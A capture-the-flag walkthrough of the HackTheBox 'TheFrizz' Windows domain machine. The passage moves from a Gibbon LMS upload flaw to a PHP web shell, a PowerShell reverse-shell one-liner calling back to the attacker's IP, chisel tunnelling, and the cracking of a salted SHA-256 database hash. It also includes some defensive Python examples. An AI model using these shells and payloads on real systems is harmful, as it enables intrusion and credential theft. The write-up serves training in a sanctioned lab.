TheFrizz

AD box on HTB.

Enumeration:

Port Scanning:

Nmap:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 10.129.20.43
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-17 20:31 +03
Nmap scan report for 10.129.20.43                                                    
Host is up, received echo-reply ttl 127 (0.15s latency).
Scanned at 2025-09-17 20:31:40 +03 for 258s
Not shown: 65515 filtered tcp ports (no-response)
PORT      STATE SERVICE       REASON          VERSION
22/tcp    open  ssh           syn-ack ttl 127 OpenSSH for_Windows_9.5 (protocol 2.0)
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
80/tcp    open  http          syn-ack ttl 127 Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.2.12)
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
| http-methods:                                                                      
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://frizzdc.frizz.htb/home/
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-09-18 00:32:39Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 127
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 127
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
<snipped>                                                                                               
Service Info: Hosts: localhost, FRIZZDC; OS: Windows; CPE: cpe:/o:microsoft:windows

<snipped>
|_clock-skew: 7h00m01s
<snipped>

We have another AD domain controller, but this time ports 22 (SSH) and 80 (HTTP) are open as well.

Let's get the FQDN using netexec:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ nxc smb 10.129.20.43
SMB         10.129.20.43    445    10.129.20.43     [*]  x64 (name:10.129.20.43) (domain:10.129.20.43) (signing:True) (SMBv1:False) (NTLM:False)

We notice that NTLM authentication is disabled (NTLM:False), so we have to use Kerberos only.

I will take the FQDN from the nmap result above and pass it to netexec, which resolves it to the corresponding IP address:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ nxc smb FRIZZDC.frizz.htb -k                                                      
SMB         FRIZZDC.frizz.htb 445    FRIZZDC          [*]  x64 (name:FRIZZDC) (domain:frizz.htb) (signing:True) (SMBv1:False) (NTLM:False)

I will add it to the hosts file:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ cat /etc/hosts
127.0.0.1       localhost
127.0.1.1       kali
<snipped>                                              

10.129.20.43 FRIZZDC.frizz.htb frizz.htb FRIZZDC

The nmap result also shows a clock skew of about 7 hours, far beyond the 5 minutes Kerberos tolerates by default, so I will use ntpdate to sync our clock with the DC:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ sudo ntpdate 10.129.20.43                                             
2025-09-18 05:27:11.891187 (+0300) +25202.019863 +/- 0.074320 10.129.20.43 s1 no-leap 
CLOCK: time stepped by 25202.019863

Let's get a quick overview of the web application framework or stack via whatweb:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]                                                                                                                     
└─$ whatweb http://frizz.htb/                                                                                                                                              
http://frizz.htb/ [302 Found] Apache[2.4.58], Country[RESERVED][ZZ], HTTPServer[Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12], IP[10.129.20.43], OpenSSL[3.1.3], PHP[8.2.12], RedirectLocation[http://frizzdc.frizz.htb/home/], Title[302 Found]

So the web server is Apache with PHP as the backend language, and it redirects us to frizzdc.frizz.htb.

Let's open it up with Firefox:

Nothing really interesting, but let's click on the staff login:

We will find that the Gibbon LMS framework is running on the web server, and it exposes its current version, which is 25.

Exploitation:

Search for any public exploits:

We will come across this web page, which outlines the vulnerability, its severity and some references:

Scrolling down, we will find a PoC in one of the references:

Vulnerable code:

$img = $_POST['img'] ?? null;
$imgPath = $_POST['path'] ?? null;
$gibbonPersonID = !empty($_POST['gibbonPersonID']) ? str_pad($_POST['gibbonPersonID'], 10, '0', STR_PAD_LEFT) : null;
$absolutePath = $gibbon->session->get('absolutePath');

if (empty($img) || empty($gibbonPersonID) || empty($absolutePath)) {
    return;
}

// Decode raw image data
list($type, $img) = explode(';', $img);
list(, $img)      = explode(',', $img);
$img = base64_decode($img);

We will see that it accepts the file without any sanitisation: the declared type and the base64 body are taken straight from the POST data, split on ';' and ',' and decoded, and the destination path comes from the request as well, so the "image" content is where we can inject our payload.

The PoC from that reference:

POST /modules/Rubrics/rubrics_visualise_saveAjax.php HTTP/1.1
Host: localhost:8080
[...]


img=image/png;asdf,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKT8%2b&path=asdf.php&gibbonPersonID=0000000001
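As an added example (my own Python, not Gibbon's PHP), the following mirrors the parsing in the vulnerable snippet beside a hardened version of the same step: the value's shape is checked strictly, the MIME type is allowlisted, the decoded bytes must start with that type's magic header, and the server rather than the client chooses the destination filename. The sample inputs are constructed to match the request shape above, and /var/uploads is an assumed upload root.

```python
import base64
import binascii
import re

# Allowlisted MIME types with the magic bytes they must start with and the
# extension the server assigns (assumption: only these two are accepted).
ALLOWED_TYPES = {
    "image/png": (b"\x89PNG\r\n\x1a\n", ".png"),
    "image/jpeg": (b"\xff\xd8\xff", ".jpg"),
}
UPLOAD_ROOT = "/var/uploads"  # assumed server-chosen upload directory


def vulnerable_parse(img: str, path: str, person_id: str):
    """Mirror of the original logic: split on ';' and ',', decode whatever
    follows, and hand back the caller-supplied path untouched."""
    if not img or not person_id:
        return None
    _declared_type, rest = img.split(";", 1)
    _prefix, data = rest.split(",", 1)
    return {"dest": path, "data": base64.b64decode(data)}


# Strict shape: <type>/<subtype>;base64,<base64 data>
_DATA_URI = re.compile(r"([a-z]+/[a-z0-9.+-]+);base64,([A-Za-z0-9+/]+={0,2})")


def hardened_parse(img: str, _client_path: str, person_id: str):
    """Same step, hardened. The client's 'path' parameter is ignored entirely."""
    if not isinstance(img, str) or not isinstance(person_id, str):
        return None
    m = _DATA_URI.fullmatch(img)
    if m is None:                       # 1. strict shape, no guessing on ';' and ','
        return None
    mime, b64 = m.group(1), m.group(2)
    if mime not in ALLOWED_TYPES:       # 2. MIME allowlist
        return None
    magic, ext = ALLOWED_TYPES[mime]
    try:
        data = base64.b64decode(b64, validate=True)
    except binascii.Error:
        return None
    if not data.startswith(magic):      # 3. content must match the declared type
        return None
    if not person_id.isdigit() or len(person_id) > 10:   # 4. numeric id only
        return None
    # 5. The decisive fix: name and directory are server-chosen, so an
    #    allowlisted image can never land as a .php file in the web root.
    #    (The magic check alone would not stop a PNG/PHP polyglot.)
    return {"dest": f"{UPLOAD_ROOT}/{person_id.zfill(10)}{ext}", "data": data}


# Constructed samples. TINY_PNG is just a PNG signature plus padding bytes.
TINY_PNG_B64 = base64.b64encode(b"\x89PNG\r\n\x1a\n" + b"\x00" * 8).decode()
SAMPLE_OK = ("image/png;base64," + TINY_PNG_B64, "photo.png", "1")
# Mirrors the PoC shape: declared png, junk where 'base64' should be,
# body that is not an image, and a .php destination chosen by the client.
SAMPLE_BAD = ("image/png;asdf," + base64.b64encode(b"not a png at all").decode(),
              "asdf.php", "0000000001")
```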

There are multiple exploits on GitHub, but to avoid being a script kiddie, I will exploit it manually.

Craft the POST request and send it via Burp Suite.

I will write a simple PHP web shell:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ cat simple_webshell.php
<?php system($_REQUEST['cmd']); ?>


┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ cat simple_webshell.php | base64
PD9waHAgc3lzdGVtKCRfUkVRVUVTVFsnY21kJ10pOyA/Pgo=

Before sending the request, we have to URL-encode the payload and set the Content-Type header to application/x-www-form-urlencoded, so the application parses the body as form fields:

Now let's try to run whoami:

Reverse shell as w.webservice:

We can use a PowerShell download cradle to get a reverse shell.

From the Nishang PowerShell scripts, I will grab the PowerShell TCP one-liner and edit it with my own IP address and the port the connection should go to:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ cat shell.ps1        
$client = New-Object System.Net.Sockets.TCPClient('10.10.16.2',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Start a python web server to host the shell.ps1:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Also start our netcat listener:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ rlwrap nc -nlvp 443
listening on [any] 443 ...  

Execute our PowerShell cradle through the web shell, and the target fetches shell.ps1 from our web server:

10.129.20.43 - - [18/Sep/2025 06:21:47] "GET /shell.ps1 HTTP/1.1" 200 -

And we will get a reverse shell:

connect to [10.10.16.2] from (UNKNOWN) [10.129.20.43] 60837

PS C:\xampp\htdocs\Gibbon-LMS> whoami
frizz\w.webservice

After some enumeration, we will find the config.php file, which often contains useful information:

PS C:\xampp\htdocs\Gibbon-LMS> dir


    Directory: C:\xampp\htdocs\Gibbon-LMS


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
<snipped>
-a----         1/20/2023   6:04 AM         294353 composer.lock
-a----        10/11/2024   8:15 PM           1307 config.php
-a----         1/20/2023   6:04 AM           3733 error.php
<snipped>

Read it:

PS C:\xampp\htdocs\Gibbon-LMS> cat config.php                                                                                                                              
<?php                                                                                
<snipped>
$databaseServer = 'localhost';                                                       
$databaseUsername = 'MrGibbonsDB';                                                   
$databasePassword = 'MisterGibbs!Parrot!?1';                                                                                                                               
$databaseName = 'gibbon';                                                            
<snipped>

Here we have a username and password for a database. We can interact with it using the mysql.exe present on the target system, or set up port forwarding and use the MySQL client on Kali.

Check what local ports are open:

PS C:\Windows\Tasks> netstat -ano | findstr LISTENING
  TCP    0.0.0.0:22             0.0.0.0:0              LISTENING       2016
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       2160
  TCP    0.0.0.0:88             0.0.0.0:0              LISTENING       652
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       956
  TCP    0.0.0.0:389            0.0.0.0:0              LISTENING       652
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:464            0.0.0.0:0              LISTENING       652
  TCP    0.0.0.0:593            0.0.0.0:0              LISTENING       956
  TCP    0.0.0.0:636            0.0.0.0:0              LISTENING       652
  TCP    0.0.0.0:3268           0.0.0.0:0              LISTENING       652
  TCP    0.0.0.0:3269           0.0.0.0:0              LISTENING       652
  TCP    0.0.0.0:3306           0.0.0.0:0              LISTENING       3696
  TCP    0.0.0.0:9389           0.0.0.0:0              LISTENING       1908
<snipped>  

We will see MySQL listening on port 3306; it did not show up in the nmap scan, so it is firewalled from the outside.

Port Forwarding:

I will upload chisel.exe to a writable directory:

PS C:\xampp\htdocs\Gibbon-LMS> cd \Windows\Tasks              
PS C:\Windows\Tasks> curl http://10.10.16.2/chisel.exe -o chisel.exe

Start the server:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ /opt/Tools/Pivoting/chisel/chisel server -p 1234 -reverse
2025/09/17 21:57:50 server: Reverse tunnelling enabled
2025/09/17 21:57:50 server: Fingerprint GFrBWG+7hbItUPCGoJBC62XRgF0hNLEFG8lie613IAY=
2025/09/17 21:57:50 server: Listening on http://0.0.0.0:1234

Then run the client to reverse-forward the target's local port 3306 to port 3306 on our machine:

PS C:\Windows\Tasks> .\chisel.exe client 10.10.16.2:1234 R:3306:localhost:3306

We will receive the connection on our server:

2025/09/17 21:59:11 server: session#1: tun: proxy#R:3306=>localhost:3306: Listening

Check for listening ports on our kali VM:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ netstat -antp
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
<snipped>                                                                            
tcp6       0      0 :::3306                 :::*                    LISTEN      163382/chisel
<snipped>
tcp6       0      0 10.10.16.2:1234         10.129.20.43:60843      ESTABLISHED 163382/chisel
<snipped>

Authenticate to the database with the credentials we found earlier:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ mysql -h localhost -u MrGibbonsDB -p -P 3306 --skip-ssl
Enter password: MisterGibbs!Parrot!?1
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 61
Server version: 10.4.32-MariaDB mariadb.org binary distribution

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]>

We can start enumerating the database for any interesting data:

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| gibbon             |
| information_schema |
| test               |
+--------------------+
3 rows in set (0.266 sec)

MariaDB [(none)]> use gibbon;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [gibbon]> show tables;
+---------------------------------------+
| Tables_in_gibbon                      |
<snipped>
| gibbonpayment                         |
| gibbonpermission                      |
| gibbonperson                          |
| gibbonpersonaldocument                |
<snipped>
+---------------------------------------+
191 rows in set (0.279 sec)

We will find the gibbonperson table; we can use desc to check its columns:

MariaDB [gibbon]> desc gibbonperson;
+---------------------------+-------------------------------------------------------+------+-----+-------------+----------------+
| Field                     | Type                                                  | Null | Key | Default     | Extra          |
+---------------------------+-------------------------------------------------------+------+-----+-------------+----------------+
<snipped>
| gender                    | enum('M','F','Other','Unspecified')                   | NO   |     | Unspecified |                |
| username                  | varchar(20)                                           | NO   | UNI | NULL        |                |
| passwordStrong            | varchar(255)                                          | NO   |     | NULL        |                |
| passwordStrongSalt        | varchar(255)                                          | NO   |     | NULL        |                |
| passwordForceReset        | enum('N','Y')                                         | NO   |     | N           |                |
<snipped>
+---------------------------+-------------------------------------------------------+------+-----+-------------+----------------+
94 rows in set (0.263 sec)

We are only interested in username, passwordStrong and passwordStrongSalt:

MariaDB [gibbon]> select username, passwordStrong, passwordStrongSalt from gibbonperson;
+-----------+------------------------------------------------------------------+------------------------+
| username  | passwordStrong                                                   | passwordStrongSalt     |
+-----------+------------------------------------------------------------------+------------------------+
| f.frizzle | 067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03 | /aACFhikmNopqrRTVz2489 |
+-----------+------------------------------------------------------------------+------------------------+
1 row in set (0.254 sec)

MariaDB [gibbon]> exit

Save the hash and the salt to a file:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ cat f.frizzle.hash                                                                          
f.frizzle:067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03:/aACFhikmNopqrRTVz2489

We can check the hash type with a tool called haiti:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ haiti '067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03'
SHA-256 [HC: 1400] [JtR: raw-sha256]
<snipped>

So it is SHA-256, used here with a salt. Note that haiti identifies the digest from its length and character set only; it cannot tell us how the salt is combined with the password.

Let's explore the hashcat modes:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]                                                                                                                     
└─$ hashcat -h                                                                                                             
hashcat (v6.2.6) starting in help mode                                                                                                                                     
                                                                                                                                                                           
Usage: hashcat [options]... hash|hashfile|hccapxfile [dictionary|mask|directory]...

<snipped>
   1410 | sha256($pass.$salt)                                        | Raw Hash salted and/or iterated
   1420 | sha256($salt.$pass)                                        | Raw Hash salted and/or iterated
  22300 | sha256($salt.$pass.$salt)                                  | Raw Hash salted and/or iterated
  20720 | sha256($salt.sha256($pass))                                | Raw Hash salted and/or iterated
  21420 | sha256($salt.sha256_bin($pass))                            | Raw Hash salted and/or iterated
   1440 | sha256($salt.utf16le($pass))                               | Raw Hash salted and/or iterated
  20800 | sha256(md5($pass))                                         | Raw Hash salted and/or iterated
  20710 | sha256(sha256($pass).$salt)                                | Raw Hash salted and/or iterated
  21400 | sha256(sha256_bin($pass))                                  | Raw Hash salted and/or iterated
   1430 | sha256(utf16le($pass).$salt)                               | Raw Hash salted and/or iterated
<snipped>

We could try several of those modes, but since Gibbon is open-source we can also read its code to find the exact algorithm used to hash passwords.

I tried 1410 without success, but 1420 worked:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ hashcat -m 1420 f.frizzle.hash /usr/share/wordlists/rockyou.txt --username        
hashcat (v6.2.6) starting

<snipped>
067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03:/aACFhikmNopqrRTVz2489:Jenni_Luvs_Magic23
                                                           
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 1420 (sha256($salt.$pass))
Hash.Target......: 067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff...Vz2489
Time.Started.....: Wed Sep 17 22:25:14 2025 (5 secs)
Time.Estimated...: Wed Sep 17 22:25:19 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  2368.9 kH/s (0.17ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 11022336/14344385 (76.84%)
Rejected.........: 0/11022336 (0.00%)
Restore.Point....: 11019264/14344385 (76.82%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: Jensta -> JazIris@@
Hardware.Mon.#1..: Util: 19%

<snipped>
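To see why 1420 was the mode that hit, here is an added Python example (my own code, not Gibbon's or hashcat's) that reproduces each sha256 construction from the hashcat list above and reports which one regenerates the stored digest from a known password. A defender auditing an application's password storage can run the same check against a test account to confirm the construction, and to judge that a single SHA-256 pass (no iteration, hence the millions of hashes per second shown above) is a weak choice compared with a slow KDF.

```python
import hashlib
import hmac

# Values from the gibbonperson row and the hashcat result above.
GIBBON_HASH = "067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03"
GIBBON_SALT = "/aACFhikmNopqrRTVz2489"


def _sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Candidate constructions keyed by the hashcat mode numbers from the list above.
# In hashcat notation sha256($x) inside a construction is the hex digest and
# sha256_bin($x) the raw digest; $pass and $salt are the UTF-8 strings.
CONSTRUCTIONS = {
    1410:  lambda p, s: _sha256_hex(p.encode() + s.encode()),
    1420:  lambda p, s: _sha256_hex(s.encode() + p.encode()),
    22300: lambda p, s: _sha256_hex(s.encode() + p.encode() + s.encode()),
    20720: lambda p, s: _sha256_hex(s.encode() + _sha256_hex(p.encode()).encode()),
    21420: lambda p, s: _sha256_hex(s.encode() + hashlib.sha256(p.encode()).digest()),
    1440:  lambda p, s: _sha256_hex(s.encode() + p.encode("utf-16-le")),
    20800: lambda p, s: _sha256_hex(hashlib.md5(p.encode()).hexdigest().encode()),
    20710: lambda p, s: _sha256_hex(_sha256_hex(p.encode()).encode() + s.encode()),
    21400: lambda p, s: _sha256_hex(hashlib.sha256(p.encode()).digest()),
    1430:  lambda p, s: _sha256_hex(p.encode("utf-16-le") + s.encode()),
}


def identify_mode(stored_hash: str, salt: str, known_password: str):
    """Return the hashcat mode whose construction reproduces stored_hash
    from (known_password, salt), or None if none of them does."""
    target = stored_hash.lower()
    for mode, build in CONSTRUCTIONS.items():
        if hmac.compare_digest(build(known_password, salt), target):
            return mode
    return None


def verify_gibbon_password(stored_hash: str, salt: str, candidate: str) -> bool:
    """Verification as the 1420 construction implies: one SHA-256 over
    salt.password, compared in constant time. Being a single fast hash,
    this is exactly what makes offline guessing at the speed above feasible;
    a slow, memory-hard KDF would be the remediation."""
    return hmac.compare_digest(_sha256_hex((salt + candidate).encode()),
                               stored_hash.lower())
```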

Here we have valid credentials for a domain user (f.frizzle):

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ nxc smb frizzdc.frizz.htb -k -u f.frizzle -p 'Jenni_Luvs_Magic23'
SMB         frizzdc.frizz.htb 445    frizzdc          [*]  x64 (name:frizzdc) (domain:frizz.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB         frizzdc.frizz.htb 445    frizzdc          [+] frizz.htb\f.frizzle:Jenni_Luvs_Magic23

Shell as f.frizzle:

Get a TGT for f.frizzle with impacket-getTGT, and export it to KRB5CCNAME:

┌──(kali㉿kali)-[~/…/Machines/HackTheBox/TheFrizz]
└─$ impacket-getTGT frizz.htb/f.frizzle:Jenni_Luvs_Magic23 -dc-ip 10.129.20.43
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Saving ticket in f.frizzle.ccache

┌──(kali㉿kali)-[~/…/Machines/HackTheBox/TheFrizz]
└─$ export KRB5CCNAME=f.frizzle.ccache

Now we can authenticate via SSH using our Kerberos ticket.

But before that we will create a krb5.conf file so our Kali knows which KDC to contact for the realm:

┌──(kali㉿kali)-[~/…/Machines/HackTheBox/TheFrizz] 
└─$ nxc smb frizzdc.frizz.htb -k --generate-krb5-file krb5.conf
SMB         frizzdc.frizz.htb 445    frizzdc          [*]  x64 (name:frizzdc) (domain:frizz.htb) (signing:True) (SMBv1:False) (NTLM:False)

┌──(kali㉿kali)-[~/…/Machines/HackTheBox/TheFrizz]
└─$ cat krb5.conf

[libdefaults]
    dns_lookup_kdc = false
    dns_lookup_realm = false
    default_realm = FRIZZ.HTB

[realms]
    FRIZZ.HTB = {
        kdc = frizzdc.frizz.htb
        admin_server = frizzdc.frizz.htb
        default_domain = frizz.htb
    }

[domain_realm]
    .frizz.htb = FRIZZ.HTB
    frizz.htb = FRIZZ.HTB
    
┌──(kali㉿kali)-[~/…/Machines/HackTheBox/TheFrizz]
└─$ sudo cp krb5.conf /etc/krb5.conf

Check the ticket cache and authenticate with SSH:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]                                                                                                                     
└─$ klist                                                                                                                                                                  
Ticket cache: FILE:f.frizzle.ccache                                                                                                                                        
Default principal: f.frizzle@FRIZZ.HTB                                                                                                                                     
                                                                                                                                                                           
Valid starting       Expires              Service principal                                                                                                                
09/18/2025 05:49:50  09/18/2025 15:49:50  krbtgt/FRIZZ.HTB@FRIZZ.HTB                                                                                                       
        renew until 09/19/2025 05:49:49                                                                                                                                    
09/18/2025 05:50:58  09/18/2025 15:49:50  ldap/frizzdc.frizz.htb@FRIZZ.HTB                                                                                                 
        renew until 09/19/2025 05:49:49
        
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]                                                                                                                     
└─$ ssh f.frizzle@frizz.htb                                                                                                                                                
The authenticity of host 'frizz.htb (10.129.20.43)' can't be established.                                                                                                  
ED25519 key fingerprint is SHA256:667C2ZBnjXAV13iEeKUgKhu6w5axMrhU346z2L2OE7g.                                                                                             
This host key is known by the following other names/addresses:                                                                                                             
    ~/.ssh/known_hosts:8: [hashed name]                                                                                                                                    
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes                                                                                                   
Warning: Permanently added 'frizz.htb' (ED25519) to the list of known hosts.                                                                                               
PowerShell 7.4.5                                                                                                                                                           
PS C:\Users\f.frizzle>

Lateral Movement to m.schoolbus:

Local Enumeration:

After doing some enumeration, I found a 7z file stored in the recycle bin of f.frizzle:

PS C:\> dir -force                                                                                                                                                         
                                                                                                                                                                           
    Directory: C:\                                                                                                                                                         
                                                                                                                                                                           
Mode                 LastWriteTime         Length Name                                                                                                                     
----                 -------------         ------ ----
d--hs           9/17/2025  8:33 PM                $RECYCLE.BIN
d--h-           3/10/2025  3:31 PM                $WinREAgent
d--hs           7/24/2025 12:41 PM                Config.Msi
l--hs          10/29/2024  9:12 AM                Documents and Settings -> C:\Users
d----           3/10/2025  3:39 PM                inetpub
d----            5/8/2021  1:15 AM                PerfLogs
d-r--           7/24/2025 12:41 PM                Program Files
d----            5/8/2021  2:34 AM                Program Files (x86)
d--h-           2/20/2025  2:50 PM                ProgramData
d--hs          10/29/2024  9:12 AM                Recovery
d--hs          10/29/2024  7:25 AM                System Volume Information
d-r--          10/29/2024  7:31 AM                Users
d----           3/10/2025  3:41 PM                Windows
d----          10/29/2024  7:28 AM                xampp
-a-hs          10/29/2024  8:27 AM          12288 DumpStack.log.tmp

PS C:\> cd '$RECYCLE.BIN'
PS C:\$RECYCLE.BIN> dir -force

    Directory: C:\$RECYCLE.BIN

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d--hs          10/29/2024  7:31 AM                S-1-5-21-2386970044-1145388522-2932701813-1103
d--hs           9/17/2025  8:33 PM                S-1-5-21-2386970044-1145388522-2932701813-1120

PS C:\$RECYCLE.BIN> cd 'S-1-5-21-2386970044-1145388522-2932701813-1103'
PS C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103> dir -force

    Directory: C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a---          10/29/2024  7:31 AM            148 $IE2XMEG.7z
-a---          10/24/2024  9:16 PM       30416987 $RE2XMEG.7z
-a-hs          10/29/2024  7:31 AM            129 desktop.ini

PS C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103> type '$IE2XMEG.7z'
<snipped>C:\Users\f.frizzle\AppData\Local\Temp\wapt-backup-sunday.7z
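The $I file that type printed above is the Recycle Bin metadata record for the deleted $R file. Here is an added Python parser for that record (my own code, not from the box or any tool on it); the sample bytes are constructed to match the 148-byte $IE2XMEG.7z entry above, including the 30416987-byte size of $RE2XMEG.7z and a deletion time taken from the listing's timestamp, which makes it a handy DFIR check for recovering where a deleted file originally lived.

```python
import struct
from datetime import datetime, timedelta, timezone

# $I layout on Windows 10/11 (version 2), little-endian:
#   0x00  u64  version (2)
#   0x08  u64  original file size in bytes
#   0x10  u64  deletion time as FILETIME (100 ns ticks since 1601-01-01 UTC)
#   0x18  u32  path length in UTF-16 code units, including the terminating NUL
#   0x1c  ...  original path, UTF-16LE
_EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)


def _filetime_to_datetime(ft: int) -> datetime:
    return _EPOCH_1601 + timedelta(microseconds=ft // 10)


def _datetime_to_filetime(dt: datetime) -> int:
    td = dt - _EPOCH_1601
    micros = (td.days * 86400 + td.seconds) * 10**6 + td.microseconds
    return micros * 10


def parse_recycle_bin_info(blob: bytes) -> dict:
    """Parse a version-2 $I record into its original path, size and deletion time."""
    if len(blob) < 28:
        raise ValueError("too short for a $I record")
    version, size, ft, name_len = struct.unpack_from("<QQQI", blob, 0)
    if version != 2:
        raise ValueError(f"unsupported $I version {version}")
    raw = blob[28:28 + name_len * 2]
    if len(raw) != name_len * 2:
        raise ValueError("truncated path field")
    path = raw.decode("utf-16-le").rstrip("\x00")
    return {"original_path": path, "size": size,
            "deleted_at": _filetime_to_datetime(ft)}


def build_sample_record(path: str, size: int, deleted_at: datetime) -> bytes:
    """Build a version-2 $I record; used here only to construct sample input."""
    name = (path + "\x00").encode("utf-16-le")
    return struct.pack("<QQQI", 2, size, _datetime_to_filetime(deleted_at),
                       len(path) + 1) + name


# Constructed sample mirroring the $IE2XMEG.7z record shown above.
SAMPLE_I = build_sample_record(
    r"C:\Users\f.frizzle\AppData\Local\Temp\wapt-backup-sunday.7z",
    30416987,
    datetime(2024, 10, 29, 7, 31, tzinfo=timezone.utc),
)
```

The 59-character path plus its NUL terminator accounts for 120 of the 148 bytes, which is exactly the size of the $I file in the listing above.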

The $I file holds the Recycle Bin metadata, including the original path, while the $R file is the deleted content itself. Copy it to our local machine via scp:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ scp f.frizzle@frizz.htb:'C:\\$RECYCLE.BIN\\S-1-5-21-2386970044-1145388522-2932701813-1103\\$RE2XMEG.7z' .
C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103\$RE2XMEG.7z                                                               100%   29MB   2.7MB/s   00:10 

Rename it and extract it to see what it contains:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]                                                                                                                     
└─$ mv C:\\\$RECYCLE.BIN\\S-1-5-21-2386970044-1145388522-2932701813-1103\\\$RE2XMEG.7z wapt-backup-sunday.7z

